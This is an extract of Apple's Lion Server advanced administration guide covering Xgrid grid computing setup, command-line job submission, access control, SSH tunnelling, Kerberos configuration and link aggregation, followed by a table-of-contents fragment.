The Xgrid controller manages communications among the computational res ources of a grid. The controller requires Mac OS X Server v10.4 or later. The controller accepts network connections from clients and agents. It receives job submis sions from clients, divides the jobs into tas ks, dispatches tasks to agents, and returns results to clients. Although there can be more than one Xgrid controller running on a subnet, there can only be one controller per logical grid. Each controller can have an arbitrary number of agents connected, but Apple has tested 128 agents per controller. However, there is no software limitation on the number of agents , and users of Xgrid can choos e to exceed 128 agents on a controller at their own risk, with a theoretical maximum equal to the number of available s ockets on the controller s ystem.
Agent
Xgrid agents run the computational tasks of a job. In Lion Server, the agent is turned off by default. When an agent is turned on and becomes active at startup, it registers with a controller. (An agent can be connected to only one controller at a time.) The controller s ends instructions and data to the agent as needed for the controllers jobs. After it receives instructions from the controller, the agent performs its as signed tas ks and sends the results back to the controller. By default, agents seek to bind to the first available controller on the LAN. Alternatively, you can s pecify that it bind to a specific controller. You can also s pecify whether an agent is always available or is available only when the computer is idle. A computer is considered idle when it has no mous e or keyboard input and ignores CPU and network activity. If a user returns to a computer that is running a grid tas k, the computer continues to run the tas k until it is finished. By default, the agent on a Mac Server is dedicated and the agent on a Mac OS X computer (not a s erver) is configured to accept tasks only when the computer has had no us er input for 15 minutes.
Xgrid
Requirements and capacities

Xgrid can s cale from small clusters of a few computers up to large organization-wide grids . Xgrid supports up to 128 agents, any number of jobs comprising up to 100,000 queued tasks , up to 128 MB of s ubmitted data per job, and up to 128 MB of results per job. These are recommended limits and are not enforced by the s oftware. You may choose to exceed these limits at your own risk.
Xgrid
Setup Xgrid
Configure Xgrid service

Plan your grid and s et up the Xgrid agent and controller. Xgrid s implifies deployment and management of computational grids.
Using Server Admin you can configure Xgrid to set up computer groups (grids or clus ters ) and allow us ers to easily submit complex computations to these grids (local, remote, or both), as an ad hoc grid or a centrally managed cluster. Setup overview Here is an overview of the steps for setting up the Xgrid service: Identify the Xgrid environment you need. Before configuring Xgrid, you mus t define the grid environment youll create. In particular, you must decide the following: The kind of authentication to use. See Authentication methods for Xgrid. Where to host your controller. See Host the grid controller. How you will manage the controller. See Manage Xgrid and Monitor grid activity. Prior to configuring, enable Xgrid s ervice. See Enable Xgrid service. Optionally, configure Xgrid using the Xgrid s ervice configuration assistant. This ass is tant helps with Xgrid configuration by automating many settings. See Configure Xgrid with the Xgrid s ervice configuration assistant. Configure your s erver as an Xgrid controller using Server Admin. See Configure controller settings. Start Xgrid on the server us ing Server Admin. See Start Xgrid. Configure your s erver as an Xgrid agent. See Configure an Xgrid agent (server). Configure your Mac OS X computers as Xgrid agents . See Configure an Xgrid agent (Lion client). Determine and implement a plan for redundency. See About Xgrid redundancy and Set up Xgrid redundancy.
Xgrid
Setup Xgrid
Use Xgrid from the command line

Learn how to use Xgrid command-line tools and the Terminal application to s ubmit jobs to a grid and to get information about jobs. After you configure an Xgrid controller and add agents to a grid, you use the Terminal application to send a job to the grid. Structure jobs for Xgrid Carefully planning and structuring a job can result in efficient use of the grid. For example, the bes t structure for a job that requires multiple searches of a large database might be to divide the database into multiple s ections and provide a s ection to each agent in the grid. About job styles Different styles of jobs often require different handling. Similarly, the way a job is structured influences how efficiently the grid completes it. Cons ider the following job styles : Everything is in one single large job, with numerous small tasks. Everything is divided into medium-sized jobs, where each job has roughly as many tas ks as there are nodes in the grid. (This type of job is usually created by a meta job script, which divides the job into smaller chunks, each of which is a job.) An entire workflow is composed of s everal interrelated jobs. Deciding how to s tructure a job can involve experimentation to discover the best way to complete it. For example, you might create a simple, small version of a job in two s tyles, s uch as by planning all tas ks in one job or by subdividing a job into multiple tiny jobs. Running both experimental jobs under similar conditions in the grid will give you a good idea of which job style is better s uited to those conditions. About job failure Xgrid jobs can rely on message-pas sing interface (MPI) APIs. For jobs that rely on MPI, if a single task fails , the entire job fails and must be resubmitted. Therefore do not us e MPI-based jobs on grids with high tas k-failure rates. Jobs that are more parallel in nature are generally unaffected by occas ional task failures . Tasks are typically reassigned to other available agents to complete the job. Mos t jobs fall into this category. Submit a job
You s ubmit jobs to a grid using the command-line tool and Terminal. Example code is available on the Apple developer website (developer.apple.com) for alternative methods of submitting jobs. Also, If you have Developer Tools installed you can view the examples located in /Developer/Examples/Xgrid/. When you submit a job to a grid make s ure you use a univers al binary. This ass ures that your job has the correct architecture no matter what architecture the grid agents provide. Also, make s ure you set your deployment target correctly. For example, if you are building a tool for Mac OS X v10.6 you must build with Mac OS X v10.6 as your deployment target. For more information about the syntax and options for the Xgrid command-line tool, s ee the xgrid man pages . Some developers and organizations offer s pecialized applications for submitting jobs to a grid. Or you can create an application using Apples developer tools for Xgrid. When determining whether to us e the xgrid command-line tool or another method for s ubmitting jobs , consider these points: If the job is s imple, use the command-line tool. If you use a shell script, use the command-line tool. If you want to use Xgrid as part of an application with a graphical user interface (GUI), use the Xgrid API to create the GUI or incorporate it in an existing application. For more information about the API, see Xgrid Reference at developer.apple.com/documentation/. Examples of Xgrid job submission and results retrieval The following Terminal commands are examples of jobs a client can s ubmit to the controller. $ xgrid -h <controller> -p <password> -job submit /bin/echo "Hello, World!" This job runs /bin/echo on the controller and agent systems with the Hello, World! parameter. $ xgrid -h <controller> -p <password> -job results -id <id> This command shows the results of the job with the id indicated. For an executable shell script marked hello.s h: #!/bin/sh /bin/echo "Hello, World!" The following command copies the shell script hello.s h to the Xgrid controller and agent sys tems and runs the script. bin/echo/ must be installed on the agent sys tem. The hello.s h script mus t have its executable bit s et before it can execute. xgrid -h <controller> -p <password> -job submit hello.sh
RELATED INFORMATION
View job status from the command line Retrieving job results from the command line
Xgrid
Manage Xgrid
Manage a grid using Xgrid Admin

After you set up an Xgrid controller, you can use Xgrid Admin to manage a grid. You can use Xgrid Admin on the server or on a remote computer that is running Mac OS X v10.5 or later. Xgrid Admin is a tool you use to monitor grids and manage agents and jobs . You can add controllers and agents to monitor and specify agents that have not joined a grid. You also use Xgrid Admin to paus e, s top, or restart jobs. You can manage computational grids with Xgrid Admin. A computational grid is a fixed group of agents with a dedicated queue. There can be multiple grids per controller but an agent can belong to only one grid. You cannot move an agent between grids while a job (or a task) is running. Use Xgrid Admin Xgrid Admin enables you to monitor grids and manage agents and jobs. You can: Check the status of a grid and its activity, including the number of agents working and available, the proces sing power in use and available, and the number of jobs running and pending Add or remove controllers and grids to manage See a list of agents in a grid and the CPU power available and in use for each agent
Add or remove agents in a grid See a list of jobs in a grid, the date and time each job was s ubmitted, its progress, and the active CPU power for the job Remove jobs in a grid Stop a job in progress Restart a job that was s topped or is complete Xgrid Admin provides controls in its graphical interface and menu commands for all of its options. You can also use the Xgrid command-line tool to perform these tasks.
RELATED INFORMATION
Manage controllers Manage agents Manage jobs Manage grids Status indicators in Xgrid Admin Use Xgrid from the command line
Xgrid
Manage Xgrid
Manage client access to Xgrid

Server Admin in Lion Server enables you to configure service access control lists (SACLs), which enable you to specify which users and groups have access to Xgrid and which administrators can manage it. Using SACLs enables you to add another layer of access control in addition to pas sword and Kerberos authentication. Only users and groups listed in an SACL have access to its corresponding s ervice. Set Xgrid SACL permissions for users and groups You use Server Admin to set SACL permiss ions for us ers and groups to access Xgrid service. 1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Acces s. 4. Click Services. 5. Select the level of restriction you want for the services : To restrict acces s to all services, s elect For all services. To s et access permissions for individual services, select For s elected s ervices below, then select a s ervice from the Service list. 6. To provide unres tricted acces s to s ervices , click Allow all users and groups. 7. To restrict access to users and groups: Select Allow only us ers and groups below. Click the Add button (+) to open the Us ers and Groups window. Drag users and groups from the Users and Groups window to the lis t. 8. Click Save. Set Xgrid SACL permissions for administrators Use Server Admin to set SACL permis sions for adminis trators to monitor and manage Xgrid. 1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Acces s.
4. Click Administrators. 5. Select the level of restriction you want for the services : To restrict acces s to all services, s elect For all services. To s et access permissions for individual services, select For s elected s ervices below, then select a s ervice from the Service list. 6. Open the Users and Groups window by clicking the Add button (+). 7. From the Users and Groups window, drag users and groups to the list. 8. Set user permissions: To grant administrator access, choose Adminis ter from the Permission pop-up menu next to the user name. To grant monitoring access , choos e Monitor from the Permission pop-up menu next to the user name. 9. Click Save.
Xgrid
Solv e Xgrid Problems
If your agents cant connect to the Xgrid controller

If an agent is a s erver, make sure the agent s ervice is enabled and the Xgrid service is started. The Xgrid controller is the only component of Xgrid that has an open port (port 4111) and requires a firewall opening. This means the Xgrid controller is the only component that advertises on or responds to queries over Bonjour. When enabling the controller, make s ure firewall port 4111 is open on your computers firewall (enabled in the Sharing Pane of Sys tem Preferences) or your corporate firewall (if accepting agents or clients outs ide your organization). Agents and clients access the controller through a Bonjour lookup or an explicit hostname/IP address. Then they initiate a connection to the controller over a user port, avoiding the need to perform privileged operation or opening the firewall.
Xgrid
Use Xgrid over SSH

You can secure Xgrid using SSH by making a tunnel between s pecific clients or agents and the controller or by running over a tunnel as a s pecific user. Create an SSH tunnel from the client or agent to the controller The s imples t way to s ecure Xgrid us ing SSH is to create a tunnel from the client or the agent to the controller. 1. Create the tunnel: $ ssh user@controller.hostname.com -L 4111:controller.hostname.com:4111 2. Have the agent or client connect to localhost instead of the controller. By doing this, SSH tunnels to the remote connection. You can use other ports on the local machine and even tunnel through an intermediary host. To run an Xgrid agent over an SSH tunnel as a specific user Using Terminal, enter the following: $ ssh -R 20000:192.168.1.100:4111 user@192.168.1.102 /usr/libexec/xgrid/ GridAgent -ServiceName localhost:20000 -RequireControllerPassword NO UsesRendezvous NO -OnlyWhenIdle NO -BindToFirstAvailable NO 20000 is the port to tunnel through the ssh connection, 192.168.1.100:4111 is the address and port number of the controller, user is the name of the user to connect, and 192.168.1.102 is the address of the remote computer to run the agent.
Xgrid
If you run tasks on multi-CPU computers

By default, each Xgrid agent (one per machine) accepts as many tasks as there are CPUs on that host, as reported by $ sysctl hw.ncpu. Agents assume that tas ks are single-threaded, s o they run two tasks to make best use of a dual-CPU system. To run multithreaded tasks that take up both CPUs , edit the agent configuration file /Library/Preferences /com.apple.xgrid.agent.plis t. To make it always only accept a single task, change the MaximumTaskCount line to MaximumTaskCount=1. Note: This must be done explicitly for each agent, and is permanent until reversed. You cant s pecify this kind of constraint as part of a job s ubmission.
Xgrid
If you submit a large number of jobs

GridStuffer is a third-party Cocoa application created by Charles Parnot of Stanford to manage multitask jobs . It provides a friendly GUI for many common Xgrid tasks . GridStuffer is available at http://cmgm.stanford.edu/~cparnot/xgrid-stanford/html/goodies/GridStuffer-info.html. A companion command-line tool, xgridstatus, provides an easy way to retrieve information about your grid and jobs. Xgridstatus is available at http://cmgm.s tanford.edu/~cparnot/xgrid-stanford/html/goodies/xgrids tatus-info.html.
Xgrid
If you want to use Xgrid on other platforms

Third-party agents are available that run Xgrid jobs on non-Mac platforms. You are responsible for ensuring that your tasks contain and call relevant platform-s pecific code. There is no intrins ic s upport for heterogeneous execution, although there is nothing that relies on Mac-specific technology. The primary technical requirement is a sufficiently functional BEEP protocol stack. Several open source implementations are available, of varying quality. You can download Curtis Campbell's cross -platform Java-based Xgrid agent at s ourceforge.net/projects/xgridagent-java/.
Xgrid
If the Xgrid controller must be restarted

When the Xgrid controller is restarted by Server Admin, the xgridctl tool, a power-outage, or a kernel panic, the following occurs: Clients and agents are disconnected. Tas ks running when the controller res tarted are stopped. Partial data from killed tasks is dis carded. (Data from finished tasks is s aved and can be retrieved as usual.) Queued jobs and tasks are saved and run as us ual. Tas ks are started/res tarted as agents reconnect and become available.
Xgrid
If Xgrid has crashed

The Xgrid controller and agent should res tart automatically if they crash. CrashReporter logs can be found in /Library/Logs /CrashReporter. Xgrid logs notices, warnings, and errors to the cons ole as well as to log files in /Library/Logs/Xgrid.
Xgrid
If you are trying to submit jobs over 2 GB

The Xgrid controller is a 32-bit process and keeps most job input and output data in memory. This means that the controller can crash if your jobs require a large amount of input or produce a large amount of output. You can us e a shared filesys tem (such as Xs an or NFS) to share large amounts of data between distributed process es.
Xgrid
If you want to enable Kerberos/SSO for Xgrid

For Xgrid to us e SSO, you need the following: The agent must have the hosts user principal in the sys tem keytab. The Kerberos database on the Kerberos domain controller must contain the agents principal. The controllers realm mus t be the default realm on the agent computer. The agents principal is created in the Kerberos domain controller and is put in the agents keytab if the agent computer is bound to the OD mas ter us ing _AUTHENTICATED BINDING_ with Directory access. Otherwis e, you mus t us e kadmin to create the principal in the Kerberos domain controller and export it to the keytab. For example, the computer hosting the agent must have the hosts user principal in the s ystem keytab, as shown here: $ hostname:~ user $ sudo klist -k $ Password: $ Keytab name: FILE:/etc/krb5.keytab KVNO Principal ---- -------------------------------------------------------------1 hostname.apple.com@XGRIDTEST.APPLE.COM 1 hostname.apple.com@XGRIDTEST.APPLE.COM 1 hostname.apple.com@XGRIDTEST.APPLE.COM The Kerberos database on the KDC must contain the agents principal, as in the following: $ sudo kadmin.local -q "get_principal hostname.apple.com" Authenticating as principal root/admin@XGRIDTEST.APPLE.COM with password. Principal: hostname.apple.com@XGRIDTEST.APPLE.COM Expiration date: [never] Last password change: Tue Apr 12 17:46:41 PDT 2005 Password expiration date: [none] Maximum ticket life: 0 days 10:00:00 Maximum renewable life: 7 days 00:00:00 Last modified: Tue Apr 12 17:46:41 PDT 2005 (root/admin@XGRIDTEST.APPLE. COM) Last successful authentication: [never] Last failed authentication: [never] Failed password attempts: 0 Number of keys: 4 Key: vno 1, Triple DES cbc mode with HMAC/sha1, no salt Key: vno 1, ArcFour with HMAC/md5, no salt Key: vno 1, DES cbc mode with CRC-32, no salt Key: vno 1, DES cbc mode with CRC-32, Version 4 Attributes: REQUIRES_PRE_AUTH Policy: [none] The controllers realm mus t be the default realm on the agent computer, as shown: $ cat /Library/Preferences/edu.mit.Kerberos # WARNING This file is automatically created, if you wish to make changes
# delete the next two lines # autogenerated from : /LDAPv3/xgridtest.apple.com # generation_id : 1637891359 [libdefaults] default_realm = XGRIDTEST.APPLE.COM [realms] XGRIDTEST.APPLE.COM = { kdc = xgridtest.apple.com admin_server = xgridtest.apple.com } [domain_realm] apple.com = XGRIDTEST.APPLE.COM .apple.com = XGRIDTEST.APPLE.COM
Link aggregation
About link aggregation

Although not common, the failure of a switch, cable, or network interface card can caus e your server to become unavailable. To eliminate these single points of failure, you can use link aggregation or trunking. This technology, also known as IEEE 802.3ad, is built into Lion Server. Link aggregation allows you to aggregate or combine multiple physical links connecting your Mac to a link aggregation device (a switch or another Mac) into a single logical link. The result is a fault-tolerant link with a bandwidth equal to the sum of the bandwidths of the physical links. For example, you can set up an Xs erve with four 1-Gbit/s ports (en1, en2, en3, and en4) and use the Network pane of Sys tem Preferences to create a link aggregate port configuration (bond0) that combines en1, en2, en3, and en4 into one logical link. The resulting logical link has a bandwidth of 4 Gbit/s . This link also provides fault tolerance. If a physical link fails, your Xs erve's bandwidth shrinks, but the Xserve can s till service requests as long as not all physical links fail at once. Link aggregation also allows you to take advantage of existing or inexpens ive hardware to increas e the bandwidth of your server. For example, you can form a link aggregate from a combination of multiple 100-Mbit/s links or 1-Gbit/s links.
Link aggregation
About the Link Aggregation Control Protocol (LACP)

IEEE 802.3ad Link Aggregation defines a protocol called Link Aggregation Control Protocol (LACP) that is us ed by Lion Server to aggregate (combine) multiple ports into a link aggregate (a virtual port) that can be used for TCP and UDP connections. When you define a link aggregate, the nodes on each side of the aggregate (for example, a computer and a switch) use LACP over each physical link to: Determine whether the link can be aggregated Maintain and monitor the aggregation If a node doesn't receive LACP packets from its peer (the other node in the aggregate) regularly, it assumes the peer is no longer active and removes the port from the aggregate. In addition to LACP, Lion Server uses a frame distribution algorithm to map a conversation to a specific port. This algorithm sends packets to the sys tem on the other end of the aggregate only if packet reception is enabled. In other words, the algorithm won't send packets if the other system isn't lis tening. Mapping a conversation to a specific port guarantees that packet reordering does not occur.
Link aggregation
Set up link aggregation in Lion Server
You create a link aggregate on your computer in the Network pane of System Preferences. To set up your Lion Server for link aggregation, you need a Mac with two or more IEEE 802.3ad-compliant Ethernet ports. In addition, you need at least one IEEE 802.3ad-compliant switch or another Lion Server computer with the same number of ports . By default, the sys tem gives the link aggregate the interface name bond <num>,where <num> is a number indicating precedence. For example, the first link aggregate is named bond0, the second is bond1, and the third is bond2. The interface name bond <num> as signed by the system is different from the name you give to the link aggregate port configuration. The interface name is for use at the command line, but the port configuration name is for use in the Network pane of Sys tem Preferences. For example, if you enter the command ifconfig -a, the output refers to the link aggregate using the interface name and not the port configuration name: bond0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500inet6 fe80::2e0:edff:fe08:3ea6 pre You do not delete or remove a link bond from the Network Pane of System Preferences . You remove the bond through the Manage Virtual Interfaces sheet used to create the bond.
1. Log in to the server as an administrative user. 2. Open Sys tem Preferences. 3. Click Network. 4. Click the Gear button and choose Manage Virtual Interfaces in the pop-up menu. 5. Click the Add button (+) and s elect New Link Aggregate in the pop-up menu. Note: You only see this option if you have two or more Ethernet interfaces on your system. 6. In the Name field, enter the name of the link aggregate. 7. Select the ports to aggregate from the list. 8. Click Create. 9. Click Done.
Link aggregation
Monitor link aggregation status

You can monitor the s tatus of a link aggregate in Lion and Lion Server using the Status pane of the Network pane of System Preferences.
1. Open Sys tem Preferences. 2. Click Network. 3. From the list of network interfaces on the left, choose the link aggregate port virtual interface. 4. Click Advanced in the lower right side of the window. 5. Select the Bond Status tab. The Sending and Receiving s tatus indicators are color-coded. Green means the link is active (turned on) and connected. Yellow means the link is active but not connected. Red means the link can't send or receive traffic. The Status pane displays a lis t containing a row for each physical link in the link aggregate. For each link, you can view the name of the network interface, its s peed, its duplex setting, the status indicators for incoming and outgoing traffic, and an overall ass ess ment of the status. 6. To view more information about a link, click the corresponding entry in the lis t.
Link aggregation
Link aggregation scenarios

Computer to computer
In this scenario, you connect the servers directly using the phys ical links of the link aggregate. This allows the two servers to communicate at a higher speed without the need for a switch. This configuration is ideal for ens uring back-end redundancy. Computer to switch In this scenario, you connect your server to a switch configured for 802.3ad link aggregation. The s witch s hould have bandwidth for handling incoming traffic equal to or greater than that of the link aggregate (logical link) you define on your server. For example, if you create an aggregate of four 1-Gbit/s links, use a s witch that can handle incoming traffic (from clients) at 4 Gbit/s or more. Otherwis e, the increased bandwidth advantage in the link aggregate won't be fully realized. Note: For information about how to configure your switch for 802.3ad link aggregation, see the documentation provided by the switch manufacturer. Computer to switch-pair In this scenario, you improve on the computer-to-switch scenario by us ing two s witches to eliminate the switch as a s ingle point of failure. For example, you can connect two links to the master switch and the remaining links to the backup switch. As long as the master switch is active, the backup s witch remains inactive. If the master s witch fails, the backup switch takes over transparently. Although this s cenario adds redundancy that protects the server from becoming unavailable if the switch fails, it results in decreased bandwidth.

Lion Server - Advanced Administration

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Lion Server - Advanced Administration

Uploaded by

Copyright:

Available Formats

Lion Server: Advanced Administration

Lion serv er fundamentals

Lion Server requirements

Lion serv er fundamentals

Lion Server tools

Server Status widget for Dashboard System Preferences

Server Admin Server Monitor System Image Utility Workgroup Manager

Command line tools us ed in Lion Server administration

Lion serv er fundamentals

Address Book service provides centralized contact information .

Web service lets you publish custom websites.

Lion serv er fundamentals

Lion serv er fundamentals

Lion serv er fundamentals

Netw ork preparation

Register the servers Internet host name

DNS records for your server

Lion serv er fundamentals

Netw ork preparation

DHCP server configuration for your server

Lion serv er fundamentals

Netw ork preparation

DNS records for your server

Lion serv er fundamentals

Netw ork preparation

Port mapping for network and server protection

Lion serv er fundamentals

Netw ork preparation

Router port mapping

Lion serv er fundamentals

Netw ork preparation

AirPort port mapping

Manage AirPort port mapping and Wi-Fi login

Lion serv er fundamentals

Netw ork preparation

Manage AirPort port mapping and Wi-Fi login

Lion serv er fundamentals

Netw ork preparation

About RADIUS for AirPort

Lion serv er fundamentals

Netw ork preparation

Services and ports

500 1701 4500 IP protocol 50 1723

UDP UDP UDP n/a T CP

Lion serv er fundamentals

Prepare an administrator computer

Lion serv er fundamentals

Use advanced tools for more services

Lion serv er fundamentals

Lion serv er fundamentals

The Serv er app

Start or stop a service

Lion serv er fundamentals

The Serv er app

Manage Lion Server remotely

Lion serv er fundamentals

The Serv er app

Manage general settings

Allow remote login to your server

Lion serv er fundamentals

The Serv er app

Manage general settings